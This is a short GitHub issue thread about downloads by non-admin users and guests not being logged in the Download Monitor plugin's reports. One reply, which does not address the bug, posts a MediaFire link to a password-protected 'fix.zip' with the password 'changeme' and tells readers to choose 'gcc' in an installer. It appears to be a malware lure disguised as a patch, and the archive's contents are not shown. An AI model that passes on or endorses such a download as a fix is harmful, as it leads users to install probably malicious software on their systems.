### ISSUE TITLE
Logging problem

### ISSUE THREAD

**Issue by razvanaldea89** [WPChill/download-monitor#1527]
**Describe the bug**
In some situations, the download isn't logged correctly, leading to incorrect data. To reproduce, just download a file using non-admin users or guests, and see in the Reports, at User Reports, if the download shows.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by razvanaldea89** [comment]
@bkballoon can you please give some more info?
